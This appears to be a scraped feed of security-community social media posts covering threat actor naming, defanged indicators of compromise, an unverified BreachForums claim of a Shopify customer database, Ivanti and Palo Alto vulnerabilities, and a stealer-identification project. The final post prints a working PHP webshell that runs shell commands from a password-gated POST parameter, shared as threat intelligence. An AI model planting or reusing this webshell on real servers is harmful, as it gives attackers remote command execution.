@vxunderground@Myrtus0x0 I swear anywhere a Mandiant goes it’s breaking “we have a great idea for naming adversaries”. At this point those who started APT {x} are high enough everywhere to do this. How about instead of ego, we agree on a unified framework for it.
@Cyberteam008@500mk500 45[.]90[.]97[.]211 appears to have the same redirect of 443 -> 302 to https://www[.]shaadi[.]com
as 176[.]125[.]240[.]33 also same body hash: sha1:fc62410b186e210cb3e56b68dc79dbede8541aca
CrowdStrike highlights a supply chain compromise described as a trivy-action attack, illustrating how the compromise unfolded from scanner to stealer in the affected ecosystem. https://t.co/UE9Ew4LbMR
🚨 BreachForums leak sale claim: “Shopify E-Commerce [10.2M+ Customers]”
A threat actor using the handle "2019" is advertising a database allegedly tied to #Shopify e-commerce customers on an underground forum. They claim the data is “fresh” and was breached on February 4, 2026.
📦 What they say is included:
• 🧾 Invoice data: full names, home addresses, phone numbers, order details
• 📧 Customer fields: names, emails, sign-in metadata, IPs, password reset tokens/timestamps
• 💳 Payment fragments: card brand + last4 (plus billing/payment intent references)
• 🏬 Store/app data: tokens/secrets/URLs, webhooks, shop metadata, product counts
• 🚚 Order ops data: suppliers, tracking numbers/links/status, refunds, cancellations, notes
• 📍 Address tables: city/state/country/ZIP + geolocation fields
🧠 Why it matters:
If real, this enables targeted phishing, account takeover attempts, refund fraud, doxxing risks, and supply-chain style scams against merchants and customers.
⚠️ This is an underground seller’s claim and has not been independently verified by a third party.
#ThreatIntel #DataBreach #BreachForums #InitialAccess #Cybercrime #Fraud #Phishing #AccountTakeover #OSINT #DarkWeb #InfoSec #CyberSecurity
@ex_raritas Thanks Andrew! Do you have any idea if Censys will offer researcher accounts at a reasonable cost? I have been tracking C2 /botnets for over 4 years on Censys. I no longer have a company that can afford the price. I would love to collaborate.
To help celebrate @arcanuminfosec Information Security's two-year anniversary, @Jhaddix gave me 5 codes good for any Arcanum course to give away!
Winners will be announced on 1/22.
👍 1 Like = 1 Entry!
♻️ 1 Share = 2 Entries!
Right before the holidays, I broke the news that DHS had effectively forced out the staffer running CISA's ransomware warning program: https://t.co/R6Zea89dvl
People who worked w/ him are really worried. And we may be starting to see the impact... https://t.co/nVVaiuDkQ4
ENDGAME: Built for hackers and tech professionals who refuse to settle.
Optimize your body. Upgrade your mind. Execute at a higher level—inside and outside the gym.
JPCERT/CC researchers show how the CVE-2025-0282 vulnerability in Ivanti Connect Secure led to an updated version of the SPAWN family. The SPAWNCHIMERA malware combines the updated functions of SPAWNANT, SPAWNMOLE and SPAWNSNAIL into one. https://t.co/7GWR0xjGw1
#ThreatHunting Tip of the Week:
Search proxy logs for 404 HTTP Response codes related to /s3.amazonaws.com/ and try visiting the hostnames.
If you see this (see below) then you may want to block it to prevent a software supply chain attack.
See the blog below for more info 🔍
Indtroducing: What is this stealer?
A new repository that allows for you to identify Stealer malware by the system information text file format commonly included in stealer malware exfiltration.
We encourage everyone to check it out and contribute!
https://t.co/PWvlGIXJpi
I have had a few people ask me is it too late to join the program, thankfully not. There is homework being done at the minute but the initial kick off call is Monday 13th Jan 10am ET.
So, if you wanna be in, now is the time.
https://t.co/ufW16rlp1q
🚨🚨🚨Ivanti, a leading provider of enterprise security solutions, has announced the discovery of two critical zero-day vulnerabilities in its Connect Secure (ICS) product. https://t.co/H4Qr36RiX9
The vulnerabilities, identified as CVE-2025-0282 and CVE-2025-0283, are currently being actively exploited by malicious actors.
Actively #PaloAlto#Vulnerability CVE-2024-0012 (9.3) and CVE-2024-9474 (6.9) exploitation is in the wild.
Post-explotaition #Webshell example dropped. 😯
<?php $z="system";
if(${"_POST"}["b"]=="iUqPd")
{
$z(${"_POST"}["x"]);
};
https://t.co/oynymXs43b